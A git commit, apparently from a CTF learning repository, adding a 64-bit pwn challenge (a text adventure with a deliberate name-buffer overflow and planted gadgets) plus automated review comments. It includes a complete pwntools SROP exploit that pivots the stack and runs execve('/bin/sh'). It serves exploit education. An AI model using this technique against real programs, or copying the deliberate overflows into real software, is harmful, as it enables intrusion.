finish 6.1.5

This commit is contained in:
firmianay
2017-11-24 10:57:02 +08:00
parent 4b6c272230
commit 2a535943e8
20 changed files with 688 additions and 12 deletions


@ -0,0 +1,40 @@
SRC_DIR = src
INC_DIR = inc
OBJ_DIR = obj
BIN_DIR = bin
OUT_DIR = $(OBJ_DIR) $(BIN_DIR)
CC = gcc
LD = gcc
INC = -I $(INC_DIR)
DEBUGFLAG=-g
CFLAGS= $(INC) -nostdlib -fno-stack-protector -Wl,-z,relro,-z,now,-z,noexecstack -static -Wno-builtin-declaration-mismatch -s
LDFLAGS= -nostdlib -fno-stack-protector -Wl,-z,relro,-z,now,-z,noexecstack -static -Wno-builtin-declaration-mismatch -s
MKDIR_P = mkdir -p
.PHONY: directories
OBJ_FILES = $(OBJ_DIR)/main.o $(OBJ_DIR)/io.o $(OBJ_DIR)/strings.o $(OBJ_DIR)/lib.o
ASM_FILES = $(SRC_DIR)/syscalls.S $(SRC_DIR)/start.S $(SRC_DIR)/gadgets.S
TARGET = $(BIN_DIR)/aaaaaa
all: directories $(TARGET)
directories: $(OUT_DIR)
$(OUT_DIR):
$(MKDIR_P) $(OUT_DIR)
$(TARGET): $(OBJ_FILES)
$(LD) $(LDFLAGS) $(OBJ_FILES) $(ASM_FILES) -o $(TARGET)
$(OBJ_DIR)/%.o : $(SRC_DIR)/%.c $(INC_DIR)/*.h
$(CC) $(CFLAGS) -c $< -o $@
.PHONY: clean
clean:
rm -f $(TARGET) $(OBJ_FILES) $(BIN_DIR)/*
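Review bot: `$(TARGET)` lists only `$(OBJ_FILES)` as prerequisites, yet the link recipe also compiles `$(ASM_FILES)` (syscalls.S, start.S, gadgets.S) in place, so editing any of the .S files never triggers a relink. Add them to the rule: `$(TARGET): $(OBJ_FILES) $(ASM_FILES)` with the recipe `$(LD) $(LDFLAGS) $^ -o $@`. The linker options (`-Wl,-z,…`, `-static`, `-s`) are duplicated in `CFLAGS`, where they do nothing for `-c` compiles; keeping them in `LDFLAGS` alone is enough. Since `-fno-stack-protector` together with the static, symbol-stripped link reads as the deliberate mitigation profile of a CTF target, a one-line comment stating which protections are intentionally on (RELRO, NX) and off (stack canary) would save the next reader a guess.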


@ -0,0 +1,9 @@
# Exploit 250
Category: Exploit
Points: 250
Author: Valno
Description:
> Play the game at: www.myabandonware.com:5500


@ -0,0 +1,56 @@
from pwn import *
elf = ELF('./game')
io = process('./game')
io.recvuntil("> ")
io.sendline("1")
io.recvuntil("> ")
io.sendline("0")
io.recvuntil("> ")
context.clear()
context.arch = "amd64"
data_addr = elf.get_section_by_name('.data').header.sh_addr + 0x10
base_addr = data_addr + 0x8 # new stack address
# useful gadget
pop_rax_addr = 0x00000000004007b2 # pop rax ; ret
syscall_addr = 0x000000000040077f # syscall ;
# sigreturn syscall
sigreturn = p64(pop_rax_addr)
sigreturn += p64(constants.SYS_rt_sigreturn) # 0xf
sigreturn += p64(syscall_addr)
# frame_2: execve to get shell
frame_2 = SigreturnFrame()
frame_2.rax = constants.SYS_execve
frame_2.rdi = data_addr
frame_2.rsi = 0
frame_2.rdx = 0
frame_2.rip = syscall_addr
# frame_1: read frame_2 to .data
frame_1 = SigreturnFrame()
frame_1.rax = constants.SYS_read
frame_1.rdi = constants.STDIN_FILENO
frame_1.rsi = data_addr
frame_1.rdx = len(str(frame_2))
frame_1.rsp = base_addr # stack pivot
frame_1.rip = syscall_addr
payload_1 = "A" * 1048
payload_1 += sigreturn
payload_1 += str(frame_1)
io.sendline(payload_1)
io.recvuntil("> ")
io.sendline("3")
payload_2 = "/bin/sh\x00"
payload_2 += sigreturn
payload_2 += str(frame_2)
io.sendline(payload_2)
io.interactive()

Binary file not shown.


@ -0,0 +1,28 @@
#ifndef __IO_H__
#define __IO_H__
#include "types.h"
#include "syscall_constants.h"
#include "syscalls.h"
#define STDIN 0
#define STDOUT 1
#define STDERR 2
static intptr write(int fd, void const* data, uintptr nbytes);
uintptr strlen(char const* str);
uintptr puts(char const* str);
intptr read(int fd, char* buf, uintptr count);
int getchar(void);
char* gets(char* str);
char* fgets(char *str, int n, int stream);
int getdigit(char *inputphrase, int a, int b);
#endif
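Review bot: `static intptr write(int fd, void const* data, uintptr nbytes);` in a header gives every translation unit that includes io.h its own internal declaration of `write`; only io.c defines it, so lib.c and main.c receive a declared-but-undefined static they cannot call and may draw a compiler warning. Move the declaration into io.c, or drop `static` if `write` is meant to be shared. Guard names beginning with a double underscore such as `__IO_H__` are reserved for the implementation; `IO_H` is the conventional spelling. Declaring `read`, `write`, `puts` and `gets` with non-standard signatures under `-nostdlib` is what `-Wno-builtin-declaration-mismatch` in the Makefile silences — a comment here saying so would explain that flag.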


@ -0,0 +1,26 @@
#ifndef __LIB__H_
#define __LIB_H__
#include "syscall_constants.h"
#include "strings.h"
#include "io.h"
#define SIZEBUF 2048
#define SIZENAME 1024
struct Character{
char name[SIZENAME];
unsigned int level;
};
void city_hall(struct Character* perso);
void welcome_message();
int village_place(struct Character* perso);
void bar();
void champion();
#endif
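Review bot: The include guard is broken: `#ifndef __LIB__H_` tests one macro and `#define __LIB_H__` defines another, so the guard never takes effect and a second inclusion of lib.h in one translation unit would redefine `struct Character`. Use a single spelling, e.g. `#ifndef LIB_H` / `#define LIB_H`. `void welcome_message();`, `void bar();` and `void champion();` are unprototyped declarations in C; write `(void)` so calls with stray arguments are rejected. SIZEBUF (2048) being larger than SIZENAME (1024) is presumably the challenge's intended overflow in city_hall; a comment next to the two defines saying so would stop a well-meaning maintainer from "fixing" it.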


@ -0,0 +1,6 @@
#ifndef __STRINGS_H__
#define __STRINGS_H__
char* strncpy(char* dest, const char* src, int n);
#endif


@ -0,0 +1,7 @@
#ifndef __SYSCALL_CONSTANTS_H__
#define __SYSCALL_CONSTANTS_H__
#define SYS_read 0
#define SYS_write 1
#endif


@ -0,0 +1,17 @@
#ifndef __SYSCALLS_H__
#define __SYSCALLS_H__
#include <types.h>
void* syscall0(
uintptr number
);
void* syscall3(
uintptr number,
void* arg1,
void* arg2,
void* arg3
);
#endif
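Review bot: `#include <types.h>` uses angle brackets while every other header in this commit includes project headers with quotes; it only resolves because the Makefile adds `-I $(INC_DIR)`, and the angle-bracket form searches system directories first, so a same-named system header would shadow the project's. Change it to `#include "types.h"`. The guard macro `__SYSCALLS_H__` uses a reserved double-underscore identifier; `SYSCALLS_H` is conventional.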


@ -0,0 +1,7 @@
#ifndef __TYPES_H__
#define __TYPES_H__
typedef unsigned long int uintptr; /* size_t */
typedef long int intptr; /* ssize_t */
#endif


@ -0,0 +1,27 @@
.intel_syntax noprefix
.intel_syntax noprefix
inc rdi
ret
xor rdi, rdi
ret
pop rsi
ret
and rdx, rsi
ret
and rcx, rsi
ret
pop r8
ret
pop rax
ret
mov dword ptr [rsi], r8d
ret
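Review bot: `.intel_syntax noprefix` appears twice at the top of the file; drop the duplicate. No section directive precedes the instruction sequences, so they go into whatever section is current at file start (`.text` by assembler default); start.S and syscalls.S state `.text` explicitly, so add it here for consistency. Because these sequences are evidently placed on purpose for the challenge and nothing in the commit calls them, a header comment saying so, e.g. `/* CHALLENGE: intentionally planted, never called */`, would keep them from being removed as dead code.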


@ -0,0 +1,75 @@
#include "io.h"
static intptr write(int fd, void const* data, uintptr nbytes){
return (intptr) syscall3(
SYS_write, /* SYS_write */
(void*)(intptr) fd,
(void*)data,
(void*)nbytes
);
}
uintptr strlen(char const* str){
char const *p;
for(p=str; *p; p++);
return p - str;
}
uintptr puts(char const* str){
return write(STDOUT, str, strlen(str));
}
intptr read(int fd, char* buf, uintptr count){
return (intptr) syscall3(
SYS_read,
(void*)(intptr) fd,
(void*) buf,
(void*) count
);
}
int getchar(void){
char c[1];
read(STDIN, c, 1);
return (int) c[0];
}
char* gets(char* str){
char c;
char *r = str;
for(c=getchar(); c != '\n' && c != '\0'; str++, c=getchar()){
*str = c;
}
*str = '\0';
return r;
}
char* fgets(char *str, int n, int stream){
char c=getchar();
int i = 0;
char *r = str;
char d[2];
while(c != '\n'){
if(i<n-1){
*str = c;
str++;
}
i++;
c = getchar();
}
*str = '\0';
return r;
}
int getdigit(char *inputphrase, int a, int b){
char str[3];
puts(inputphrase);
fgets(str, 3, STDIN);
while(strlen(str) != 1 || str[0]>57-9+b || str[0]<48+a){
puts("Invalid number, try again.\n");
puts(inputphrase);
fgets(str, 3, STDIN);
puts("\n");
}
return str[0]-48;
}
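Review bot: `getchar` ignores the return value of `read`, so at end of input it returns the uninitialised byte `c[0]`; `fgets` then loops `while(c != '\n')` on stale data and `gets` likewise never terminates, so a client that closes its connection leaves the process spinning at 100% CPU instead of exiting. Propagate the short read as -1 and stop both readers on it; `c` must be `int` in the readers for the sentinel to be distinguishable from a 0xff byte. `char d[2]` in fgets is unused and can go. `gets` is unbounded by construction and appears uncalled in this commit; if it is kept only for completeness, say so in a comment.
```c
int getchar(void){
    char c[1];
    if(read(STDIN, c, 1) != 1)
        return -1;                      /* EOF or read error */
    return (int)(unsigned char) c[0];
}

char* fgets(char *str, int n, int stream){
    int c = getchar();
    int i = 0;
    char *r = str;
    while(c != '\n' && c != -1){
        /* … unchanged: bounded copy of c into str … */
        c = getchar();
    }
    *str = '\0';
    return r;
}
```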


@ -0,0 +1,144 @@
#include "lib.h"
void welcome_message(){
char *message = "\n"
"__________________________________\n"
"\n"
"--- Welcome in BeerFigher III ---\n"
"__________________________________\n"
"\n"
"You just arrived in the small village of Foo in\n"
"the country, after a long day of travel.\n"
"Thirsty, you could just go and grab a beer at the\n"
"bar. You may also go in the city hall and get\n"
"registered with the mayor.\n"
"\n"
"\n";
puts(message);
}
void city_hall(struct Character* perso){
char digit;
char name[SIZEBUF];
puts("Welcome ");
puts(perso->name);
puts("! I am the mayor of this small town and my role is to register the names of its citizens.\nHow should I call you?\n");
puts("[0] Tell him your name\n");
puts("[1] Leave\n");
digit = getdigit("Type your action number > ", 0, 1);
switch(digit){
case 0:
puts("Type your character name here > ");
fgets(name, SIZEBUF, STDIN);
strncpy(perso->name, name, SIZEBUF);
puts("\n");
break;
case 1:
puts("You just left the old man without even saying \"Good bye\"\n");
break;
default:
puts("Invalid action\n");
break;
}
}
int village_place(struct Character* perso){
char *message = "\n\n"
" ~ ~~ __\n"
" _T .,,. ~--~ ^^\n"
" ^^ // \\ ~\n"
" ][O] ^^ ,-~ ~\n"
" /''-I_I _II____\n"
" __/_ / \\ ______/ '' /'\\_,__\n"
" | II--'''' \\,--:--..,_/,.-{ },\n"
" ; '/__\\,.--';| |[] .-.| O{ _ }\n"
" :' | | [] -| ''--:.;[,.'\\,/\n"
" ' |[]|,.--'' '', ''-,. |\n"
" .. ..-'' ; ''. '\n"
"\n"
"You are in the village square.\n"
"In front of you can see the entrance of the local\n"
"bar from where one could hear laughter and singing.\n"
"On your\n"
"left stands is the massive front of the city hall that\n"
"dominates the village. On your right, in the \n"
"shadow of the bar, an alley filled with unconscious bodies and\n"
"empty pints leads to a dark yard where the most\n"
"valiant barflies of the country can face each other.\n"
"It's time to choose in which place you will enter !\n"
"------------\n\n";
char *choice0 = "[0] The bar\n";
char *choice1 = "[1] The City Hall\n";
char *choice2 = "[2] The dark yard\n";
char *choice3 = "[3] Leave the town for ever\n";
puts(message);
puts(choice0);
puts(choice1);
puts(choice2);
puts(choice3);
int digit = getdigit("Type your action number > ", 0, 3);
switch(digit){
case 0:
bar();
break;
case 1:
city_hall(perso);
break;
case 2:
champion();
break;
case 3:
puts("By !\n");
return 0;
break;
default:
puts("Invalid choice\n");
break;
}
return 1;
}
void bar(){
char digit;
char *message = "\n\n"
" _.._..,_,_ \n"
" ( )\n"
" ]~,\"-.-~~[ Welcome in Foo bar\n"
" .=])' (; ([ ---\n"
" | ]:: ' [ We are currently close\n"
" '=]): .) ([ Please, come back later\n"
" |:: ' |\n"
" ~~----~~\n"
"\n\n";
puts(message);
puts("[0] Leave\n");
digit = getdigit("Type your action number > ", 0, 0);
switch(digit){
case 0:
puts("You just left the bar\n");
break;
default:
puts("Invalid action\n");
break;
}
}
void champion(){
char digit;
puts("\n\n-- Feature currently in development...\n\n");
puts("[0] Leave\n");
digit = getdigit("Type your action number > ", 0, 0);
switch(digit){
case 0:
puts("You just left the yard\n");
break;
default:
puts("Invalid action\n");
break;
}
}
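Review bot: In city_hall, `fgets(name, SIZEBUF, STDIN)` fills the local `name[SIZEBUF]` and `strncpy(perso->name, name, SIZEBUF)` then copies SIZEBUF bytes into `perso->name`, which lib.h sizes at SIZENAME; that is a stack overflow of the caller's `struct Character` and is presumably the challenge's intended bug, so mark it, e.g. `/* CHALLENGE: intentional overflow of perso->name (SIZENAME < SIZEBUF) */`, so it survives later cleanups. `digit` is declared `char` in city_hall, bar and champion while getdigit returns `int` and village_place stores it as `int`; pick one. In village_place the `break;` after `return 0;` in `case 3:` is unreachable and can be dropped. The user-facing strings `Welcome in BeerFigher III` and `By !` look like typos for `BeerFighter` and `Bye !`; change them deliberately if at all, since any test expecting the current text would break.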


@ -0,0 +1,16 @@
#include "syscalls.h"
#include "io.h"
#include "lib.h"
char a[6] = {5, 8, 7, 6, 2, 7};
int main(int argc, char **argv){
struct Character perso = { "Newcomer", 0};
welcome_message();
while(village_place(&perso));
puts("\n");
return 0;
}
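Review bot: The global `char a[6] = {5, 8, 7, 6, 2, 7};` is never referenced in main.c or in any other file of the commit; if it exists to give `.data` a particular size or content for the challenge (the exploit script in this commit derives an address from `.data`), say so in a comment such as `/* CHALLENGE: deliberate .data filler, keep */`, otherwise remove it. `argc` and `argv` are unused in main; start.S does pass them, so either use `(void)argc; (void)argv;` or declare `int main(void)`.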


@ -0,0 +1,18 @@
.intel_syntax noprefix
.text
.globl _start
_start:
xor rbp, rbp /* rbp = 0 */
pop rdi /* rdi = argc */
mov rsi, rsp /*rsi = (char*) argv[] */
and rsp, -16 /* last 4 bytes of rsp to 0 */
call main
mov rdi, rax /* syscall param 1 = return value of main */
mov rax, 60 /* SYS_exit */
syscall
ret
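Review bot: The comment on `and rsp, -16` is wrong: the mask clears the low 4 bits of rsp to 16-byte-align the stack before `call main`, not "the last 4 bytes"; change it to `/* align rsp to 16 bytes (clear low 4 bits) */`. The `ret` after `syscall` is unreachable because SYS_exit does not return; remove it or comment it as a deliberate trap. The `pop rdi` / `mov rsi, rsp` comments describe the SysV initial stack correctly, but `(char*) argv[]` would be clearer as `char **argv`.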


@ -0,0 +1,10 @@
#include "strings.h"
char* strncpy(char* dest, const char* src, int n){
char* r = dest;
for(int i=0; i<n; i++, src++, dest++)
*dest = *src;
*dest = 0;
return r;
}
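Review bot: This `strncpy` copies exactly `n` bytes regardless of where `src` ends and then writes a terminator at `dest[n]`: it reads past a shorter source string and always writes n+1 bytes, one beyond the size the caller passed (city_hall passes SIZEBUF for a SIZEBUF-sized source buffer). Unlike the standard function it neither stops at NUL nor stays within n. If the name copy in city_hall is meant to remain the challenge's overflow, the extra byte here is an additional, probably unintended, out-of-bounds write; the version below stops at the source NUL and terminates only when there is room inside n. The `int n` parameter in strings.h also differs from the standard `size_t`; a negative n silently copies nothing.
```c
char* strncpy(char* dest, const char* src, int n){
    char* r = dest;
    int i = 0;
    for(; i<n && *src; i++, src++, dest++)
        *dest = *src;
    if(i<n)
        *dest = 0;                  /* terminate only inside the caller's n bytes */
    return r;
}
```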


@ -0,0 +1,17 @@
.intel_syntax noprefix
.text
.globl syscall0, syscall1, syscall2, syscall3, syscall4, syscall5
syscall0:
mov rax, rdi /* rax (syscall number) = function param 1 (rdi) */
syscall /* enter syscall */
ret
syscall3:
mov rax, rdi /* rax (syscall number) = function param 1 (rdi) */
mov rdi, rsi /* rdi (syscall param 1) = func param 2 (rsi) */
mov rsi, rdx /* rsi (syscall param 2) = func param 3 (rdx) */
mov rdx, rcx /* rdx (syscall param 3) = func param 4 (rcx) */
syscall /* enter syscall */
ret
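Review bot: `.globl syscall0, syscall1, syscall2, syscall3, syscall4, syscall5` exports six symbols but only `syscall0` and `syscall3` are defined in the part of the file shown (the section may continue past the last visible line); `.globl` on an undefined name does not create it, so any caller of `syscall1` would fail at link time with an undefined reference. Trim the list to `.globl syscall0, syscall3`, or add the missing stubs. syscall3's register shuffling is correct (`rcx` is moved into `rdx` before `syscall`, which clobbers rcx and r11); a comment noting that the kernel takes its fourth argument in `r10`, not `rcx`, would help anyone adding syscall4 later.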